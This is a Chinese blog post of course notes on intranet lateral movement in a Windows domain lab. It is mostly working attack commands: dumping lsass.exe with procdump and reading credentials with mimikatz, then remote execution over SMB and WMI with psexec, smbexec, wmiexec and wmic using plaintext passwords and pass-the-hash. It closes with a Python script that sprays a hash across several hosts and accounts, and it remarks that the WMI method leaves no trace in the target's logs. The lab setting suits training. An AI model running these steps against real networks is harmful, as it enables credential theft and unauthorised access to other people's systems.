内网渗透-smb&wmi

最新推荐文章于 2024-05-13 11:06:50 发布
最新推荐文章于 2024-05-13 11:06:50 发布
阅读量504 收藏
点赞数
分类专栏: 内网渗透 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/G208_522/article/details/127538695
版权

内网渗透-smb&wmi

!–看小迪老师课程自己做的笔记

一、prodump + mimikatz配合获取密码

1、使用procdump将lsass.exe转储出来
procdump -accepteula -ma lsass.exe lsass.dmp

image-20220702200431435

转储成功

image-20220702200508727

2、使用mimikatz获取转储的文件中的密码

mimikatz上执行命令(可以将lsass.dmp文件搞出来在其他地方运行mimikatz,解决mimikatz执行权限问题):

privilege::debug    //提权
sekurlsa::minidump lsass.dmp   //注意lsass.exe必须与mimikatz.exe同目录
sekurlsa::logonPasswords full

image-20220702201730481

image-20220702201924336

二、域横向移动SMB服务利用 psexec(官方)

官方提供的psexec不提供hash传递

利用SMB服务可以通过明文密码传递来远程执行,条件必须打开445端口

1、使用psexec,现有ipc连接,psexec需要明文传递

#建立ipc$连接
net use \\192.168.139.131\ipc$ "ghy.admin123" /user:ghy\administrator 
#psexec明文传递
paexec \\192.168.139.131 -s cmd     //-s是以system权限运行

image-20220702203153701

image-20220702203409929

2、使用psexec,无ipc连接,明文传递

#不用先ipc连接,直接使用psexec
psexec \\192.168.139.131 -u ghy\administrator -p ghy.admin123 -s cmd

image-20220702203743123

三、域横向移动SMB服务利用psexec、smbexec(非官方)

1、使用psexec,无ipc连接,明文及hash传递

明文传递:

注意:这里必须是/,非官方自带psexec必须是斜杠。

psexec.exe ghy/administrator:ghy.admin123@192.168.139.131

image-20220704174111856

hash值传递:

psexec -hashes :d4a1605da045ea9ea9873e349dabbbfe ghy/administrator@192.168.139.131

注意:这里必须是/,非官方自带psexec必须是斜杠。

image-20220704095016675

2、使用smbexec,明文及hash值传递

明文传递:

smbexec.exe ghy/administrator:ghy.admin123@192.168.139.131

image-20220704175058354

hash传递:

smbexec.exe -hashes :d4a1605da045ea9ea9873e349dabbbfe ghy/administrator@192.168.139.131

image-20220704175458459

四、域横向移动WMI服务利用----cscript、wmiexec、wmic

wmi是通过135端口进行利用,支持明文和hash值的方式进行认证,并且该方法不会在目标日志系统留下痕迹

1、官方自带明文传递,wmi无回显,cscript有回显

自带wmi明文传递,无回显

wmic /node:192.168.139.131 /user:ghy\administrator /password:ghy.admin123 process call create "cmd.exe /c ipconfig > c:\1.txt"

image-20220704180354493

image-20220704180526306

自带cscript明文传递,有回显

cscript //nologo wmiexec.vps /shell 192.168.139.131 ghy\administrator ghy.admin123

2、非官方套件,明文及hash传递,有回显

明文传递:

wmiexec.exe ghy/administrator:ghy.admin123@192.168.139.131 "ipconfig"

image-20220704182837159

hash传递:

wmiexec.exe -hashes :d4a1605da045ea9ea9873e349dabbbfe ghy/administrator@192.168.139.131 "ipconfig"

image-20220704183117837

五、域横向移动以上服务hash批量利用python编译为exe

# pyinstaller.exe -F fuck_neiwang.py
import os, time

ips = {
    '192.168.139.131',
    '192.168.139.128'
}
users = {
    'administrator',
    'ghy',
    'ghy/administrator',
    'ghy/websec'
}
hashes = {
    'd4a1605da045ea9ea9873e349dabbbfe',

}
for ip in ips:
    for user in users:
        for passwordhash in hashes:
            # wmiexec.exe -hashes :hash user@ip "whoami"
            exec = "wmiexec.exe -hashes :" + passwordhash + " " + user + "@" + ip + " whoami"
            print('-->' + exec + '<--')
            os.system(exec)
            time.sleep(0.5)
高小白—专业摸鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SMB中继——内网渗透
include_voidmain的博客
04-26 3307
0x01 SMB协议 SMB概述: SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。 SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。 SMB使用了NetBIOS的应用程序接口 (ApplicationProgram Interface,简称API),一般端口使用为139,4
ISC-内网渗透 -最终版.pdf
04-08
通过对Active Directory渗透的基础知识、认证方式、远程命令执行技术及内网渗透流程的详细介绍,我们可以了解到,在实施内网渗透时,掌握这些核心技术点对于成功渗透目标网络至关重要。此外,合理运用各种技术和工具...
smb 0day内网渗透和防御
pray for the future
07-30 496
<br />先说说内网渗透吧。在渗透的过程里,第一个需要面对的问题就是:我们如何快速定位到windows 2008、windows7和vista。我这里提供两个思路:<br />1、扫描windows SMB的版本,例如windows7就是6.1(如下图),工具大家自己去找找吧;为了和谐,就不透露可以扫SMB版本的程序名称了。<br /><br />2、如果你找不到SMB版本扫描器,你可以尝试扫描IIS的版本。这个方法相对简单也准确,80的扫描器多了去了。<br />顺带提醒一下,大范围扫描很容易触发警报,
渗透测试笔记】之【内网渗透——横向移动:WMI的使用】_wmi渗透测试
最新发布
2401_84970893的博客
05-13 261
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
渗透测试笔记】之【内网渗透——横向移动:WMI的使用】
AA8j的博客
11-18 4308
文章目录1. 自带WMIC2. Invoke-WmiCommand.ps13. Invoke-WMIMethod.ps14. wmiexec.vbs5. wmiexec.py 1. 自带WMIC 特点: 不会产生日志记录 没有回显,若要查看命令结果需要配合IPC$与type命令 wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.t
信息收集 -- 内网渗透(wmic)
weixin_41489908的博客
11-24 662
昨天晚上和舍友聊天,彼此聊着自己的前女友,聊到最后,我们同时对彼此说了一句,你真贱。。。 ---- 网易云热评 一、WMIC简介 WMIC是扩展WMI(Windows Management Instrumentation,Windows管理规范),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,比如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScrip..
clevo-xsm-wmi:https的克隆
05-11
clevo-xsm-wmi 用于Clevo SM系列笔记本电脑的键盘背光的内核模块。 (以及几种EM / ZM / DM系列型号) 基于TUXEDO Computers GmbH创建的tuxedo-wmi。 在tuxedo-wmi上的添加 Sysfs界面可在模块加载后控制亮度,...
asus-nb-wmi.rar_Welcome!_asus wmi
09-22
【标题】"asus-nb-wmi.rar_Welcome!_asus wmi" 提供的是一款专为华硕笔记本电脑设计的WMI热键驱动程序,欢迎有需求的朋友下载分享。 【华硕笔记本WMI热键驱动】是华硕笔记本用户必备的软件组件之一,它主要负责处理...
[HACK学习呀] - 2020-08-23 内网渗透 - 内网中的信息收集1
08-03
内网渗透网络安全领域的重要环节,特别是在企业网络环境中,一旦突破外围防线,内网信息收集成为继续渗透的关键步骤。本文将详细阐述内网中的信息收集方法,主要关注在工作组环境下的策略。 首先,识别网络环境是...
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
网络安全渗透测试中,权限提升是一个关键环节,尤其是在无法利用系统级溢出漏洞时,数据库提权成为了攻击者常用的技术。本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行提权,以及涉及的相关知识点。 首先...
C#实例 实现WMI连接目标,运行命令与获取计算机信息并能打开对方SMB同时实现连接并完成文件传输一整套解决方案 附Log4Net日志
03-01
C#实例 实现WMI连接目标,运行命令与查询状态并能打开对方SMB同时实现连接并完成文件传输一整套解决方案 附Log4Net日志 此实例完整演示了如何连接135RPC服务,即WMI服务,实现功能: 1、远程获取计算机信息 2、执行命令 3、重启电脑 4、打开进程 5、打开共享SMB 6、连接SMB并实现传输文件等
内网渗透----3、后渗透信息收集之wmic命令
七天
07-14 550
文章目录一、WMIC定义二、WMIC的使用三、Powershell下的get-WMI 一、WMIC定义 WMIC是扩展WMI(Windows Management Instrumentation,Windows管理规范),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,比如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的 编程语言或VBScript之类的 脚本语言,或者不掌握
内网渗透-域横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1732
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
psexec与wmi内网渗透的使用
weixin_30462049的博客
09-10 527
psexec是一个很好的管理工具,在内网渗透中也被广泛使用。 但太“出名”也往往会遭来各种麻烦。 在有安全监听、防护的内网中使用psexec会容易触发告警。 1.psexec用法(前提:对方要开启admin$共享 且知道对方密码或者hash): psexec.exe \\远程目标机器ip-u账号-p密码cmd 机器在第一次使用psexec的时候,会弹出确认提示框,为...
Windows渗透测试中wmi的利用
weixin_30784501的博客
04-06 278
0x01 关于WMI WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI渗透测试中的价值在于它不需要下载和安装, 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。这一点是其它渗透测试工具所不能相比的。 0x02 WMI信息收集 1.检索系统已安装的软件 ...
内网渗透信息收集-wmic命令自动收集。
weixin_42109829的博客
02-06 804
自动收集信息 为了简化操作,可以创建一个脚本, 在目标机器上完成流程、服务、用户账号、用户组、网时区等信息的查询工作。网上有很多类似的脚本,当然,我们也可以自己定制一个。在这里,笔者推荐一个利用WMIC收集月标机器信息的脚本。 WMIC ( Windows Management Instrumcntation Command-Line, Windows 管理工具命令行)是最有用的Windows命令行工具。在默认情况下,任何版本的Windows XP的低权限用户不能访问WMIC. Windows 7以上版本的
入门渗透:SMB入侵——Dancing
栉风沐雪的博客
02-01 651
SMB(全称是Server Message Block),被用于Web连接和客户端与服务器之间的信息沟通一般运行服务于445号端口,用于在计算机间共享文件、打印机、串口等SMB工作过程:版本协商 会话请求凭据 文件路径凭据 对共享资源进行操作在下文使用的是hackthebox的Dancing靶机。
网络安全渗透实战学习
Innocence_0的博客
10-16 1156
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值